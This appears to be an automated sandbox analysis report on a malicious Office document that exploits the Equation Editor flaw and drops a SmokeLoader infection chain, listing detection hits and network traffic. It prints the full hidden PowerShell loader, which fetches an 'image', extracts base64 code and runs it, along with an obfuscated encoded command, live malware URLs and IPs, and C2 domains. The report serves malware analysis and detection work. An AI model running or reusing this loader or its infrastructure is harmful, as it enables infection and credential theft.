              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2772, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Local\Temp\2kro4ew5.lct.ps1

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm
              Timestamp:05/27/24-18:36:08.149095
              SID:2039103
              Source Port:49176
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/27/24-18:35:39.953040
              SID:2049038
              Source Port:443
              Destination Port:49174
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/27/24-18:35:37.303035
              SID:2018856
              Source Port:443
              Destination Port:49174
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/27/24-18:35:37.303035
              SID:2047750
              Source Port:443
              Destination Port:49174
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/27/24-18:35:39.401568
              SID:2025012
              Source Port:443
              Destination Port:49174
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
              Source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
              Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
              Source: http://198.46.177.156/8080/RBG.txtVirustotal: Detection: 8%Perma Link
              Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Virustotal: Detection: 12%Perma Link
              Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
              Source: http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.docVirustotal: Detection: 8%Perma Link
              Source: C:\Windows\explorer.exeCode function: 14_2_03F15174 CryptAcquireContextA,14_2_03F15174
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,18_2_00083098
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,18_2_00083717
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083E04 RtlCompareMemory,CryptUnprotectData,18_2_00083E04
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081198 CryptBinaryToStringA,CryptBinaryToStringA,18_2_00081198
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000811E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,18_2_000811E1
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_0008123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,18_2_0008123B
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081FCE CryptUnprotectData,RtlMoveMemory,18_2_00081FCE
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,21_2_000826AC
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0008178C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0008118D
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00082404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_00082404
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_0008245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_0008245E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_0008263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_0008263E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,28_2_000C2799
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C25A4 CryptBinaryToStringA,CryptBinaryToStringA,28_2_000C25A4

              Exploits

              barindex
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.46.177.156 Port: 80Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
              Source: ~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp.4.drStream path '_1778318474/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp.4.drStream path '_1778318479/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49172 version: TLS 1.2
              Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
              Source: Binary string: RegAsm.pdb4 source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
              Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,18_2_00081D4A
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,18_2_00083ED9
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,18_2_00082B15
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
              Source: C:\Windows\explorer.exeCode function: 23_2_000E1EB4 FindFirstFileW,23_2_000E1EB4
              Source: C:\Windows\explorer.exeCode function: 23_2_000E1DB0 FindFirstFileW,23_2_000E1DB0
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: global trafficDNS query: name: z2.ink
              Source: global trafficDNS query: name: z2.ink
              Source: global trafficDNS query: name: z2.ink
              Source: global trafficDNS query: name: z2.ink
              Source: global trafficDNS query: name: z2.ink
              Source: global trafficDNS query: name: z2.ink
              Source: global trafficDNS query: name: paste.ee
              Source: global trafficDNS query: name: uploaddeimagens.com.br
              Source: global trafficDNS query: name: prolinice.ga
              Source: global trafficDNS query: name: prolinice.ga
              Source: global trafficDNS query: name: prolinice.ga
              Source: global trafficDNS query: name: prolinice.ga
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.46.177.156:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
